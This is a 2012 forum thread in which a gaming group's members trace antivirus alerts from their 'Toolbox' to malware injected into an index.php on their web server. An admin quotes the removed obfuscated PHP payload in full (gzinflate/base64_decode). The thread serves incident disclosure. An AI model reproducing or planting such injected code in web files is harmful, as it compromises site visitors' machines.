Problem with the toolbox

Peterthomson · Posted: Thu Jun 14, 2012 9:10 pm Post subject: Problem with the toolbox

Hello friends,

Since today I have a problem that I have never had before. As always, I opened the toolbox to join the server ; but after the end of a map ( so during the loading of the next ) my screen brought me back to the desk.

A window of my anti -malware ( I don't know the correct word in English ) " Bitdefender " was opened and it was written that it had stopped a malware, apparently from the toolbox. It happened twice this afternoon. This is my screen :

Click to view this image at its original size

Click on the image to view it at its original size

What do you think ? Is it really coming from the toolbox ? What have I to do ? Thanks for your help

Peterthomson Waving Goodbye

Peterthomson · Posted: Sat Jun 16, 2012 1:03 pm Post subject: Toolbox' problem

Hum, it seems that the problem has disappeared. Very strange scratch chin

Peterthomson · Posted: Sat Jun 16, 2012 6:46 pm Post subject: Trojan

Indeed it's quite disturbing, hope my computer isn't affected... I've no confidential data but a trojan can take the control of our computer to use it against an other ( the hacker protects its identity ), for example. This night I'll do a complete check with Bitdefender, although I think it won't be efficient...
But, this is quite surprising that I'm the only user of the toolbox who have this problem. scratch chin

EDIT : I've checked by both opening the toolbox and Bitdefender. On Bitdefender, you can see the number of "infected data" . When I looked at it, there were 17 infected files ! Then I went on the toolbox, I pressed on "refresh", I went back on Bitdefender and the number of infected files was 18 ! Yet, I've no more windows of bitdefender like in the screen I did, and put on this subject.

To prevent any kind of possible damage, I prefer to remove the Toolbox from my computer.

Peterthomson · Posted: Sun Jun 17, 2012 3:45 pm Post subject:

Indeed an answer would be nice, but I don't think PFC is doing illegal things, PFC has always beeing involved in the fight against hackers... Hope we'll have a response soon Sad

**Grabbi** · Posted: Sun Jun 17, 2012 4:30 pm Post subject:

had simply no time to respond yet ( since have a lack of men power atm on several projects like FHC and webshop)

Similar message I got mailed about our website with Antivir I think it was.

End of message the Antivir developers visited our website scanned it and found that their program is showing false alert. Super !

Am running Eset Nod32 and all is fine with Toolbox Download.

Same is when Patte is compiling a new version of our Toolbox with Visual Studio 2010 Ultimate his computer scans as well all content he up/downloads and our server over which we distribute the Toolbox does same again to make sure there´s nothing wrong (maleware, virus etc).

Once again, sry for late answer but we are running on low reinforcements atm !

IF there would be something wrong we had 50000+ problems, cause that is the download counter atm for the Toolbox ( well 64 ppl would be enough (24/7) impov.)

The Toolbox is also availabe at CT !!! major German IT Newsmagazin ( they also scan the content of course!)

http://www.heise.de/download/pfc-toolbox-for-forgotten-hope-1172063.html

Greetz

Grabbi

Waving Goodbye

PS: @Peter

Maybe you got victim by a Trojan which is spreading out on your hdds affecting several programs now ( such as Toolbox etc)

Go here http://www.eset.com/home/products/online-scanner/

and try ESET’s Free Online Scanner It scans your computer for threats easily and effectively.

Peterthomson · Posted: Sun Jun 17, 2012 4:42 pm Post subject:

Hi Grabbi,

Thanks for answering, and I understand you are busy. Well, I hope this is a false alert ! I will re download the toolbox soon, maybe the problem will have disappeared.

Waving Goodbye

**Grabbi** · Posted: Mon Jun 18, 2012 10:41 pm Post subject:

ok tnx to Napoleon who wrote a PM to me and posted as well in Shout box I could locate a malware code in the INDEX.php of the LIVE VIEWER which the Toolbox is calling for as soon as it is clicked upon. So it s not the Toolbox itself, its a external website part we setup for Toolbox services NOONE has on harddisk drive.

I deleted that crap and replaced it with the original file after detecting.

Question is :
How is someone able to access our web server and contaminate the index.php and reame.html ( which is totally useless ) from the Toolbox live viewer !

We ll investigate this and secured access !

All fine & save now and tnx to Napoleon !

Peterthomson · Posted: Tue Jun 19, 2012 1:15 pm Post subject:

great ! Thanks Grabbi and thanks to Napoleon.
The number of hacking attempts is terrible... The web becomes more dangerous than the jungle Rolling Eyes

Unfortunately I can't help you to investigate, I have no knowledges about this !

Waving Goodbye

**Grabbi** · Posted: Tue Jun 19, 2012 1:23 pm Post subject:

Quote:

#c3284d#
echo(gzinflate(base64_decode("bVNNj5swEP0ttdSVKZPEYxsDZd0eov6CHqMcWD4WtFkgwG60i va/d2ygvfSArPHMvHnveXicirEd5h/z+HG/2rIv3l6rbt4XY5XP1a9L5SLOBhZk130+DFVXHpv2UvJryOjus8jnouHXW3Bv7E6gPERZbVk99q8sc5BPxVTaYeznfv4Yqp3cOp7y23NwnyZ7Omd1aHnz8FAHPzk7Nvl4ZCHry4oF3xnLKntru7K/nVj1nl/YOevsCRVIAUoI0FpDmoJUGpSMQQsNiIJiCagS0LGhWIOkO6UTn9cC4gQwoWYCQSFBygRkiqAVVQsEQ2A6Ah0Zh41S+iqNDst4bKWWU8eQ6qU3dlUx8aKsIQa SJiWQUoQERUOp1tCF8UFKlZiQBFKi3ThASqooXkhtYyjtWFB65aTSVRCRUm6EEyoiip0f6 V8wYqUiYmWcH7gNFolv9tnVrTRZsDSJEcLLd3ZgoshAs5i5GoB073mbRRNKn9788dR8+z+v3bR1Nq5ZXIhubm7dUohN5maCWN5R0ZxNllgfjODJYyfDEfmPLCP9I0uy16l w+3LO2povu7Tf1jyo+5G31uzkDt2X7TASYfvFStrUNgyD+4ttM9rSaQp/z2PbPZ/qM+9OL +cDb7/y5lsThBjQb1DxaaLj8/Gw/k5/AA==")));
#/c3284d#

This is the maleware code and when you google it you ll find many many affected Websites past days

index.php s
and
template files ( tpl)

are contaminated with this code snippet above on other websites.Good that no damage has been done to us cause attacker just had very very limited access to our webfolder Very Happy

Peterthomson · Posted: Tue Jun 19, 2012 2:38 pm Post subject:

PFC is in war against hackers Cool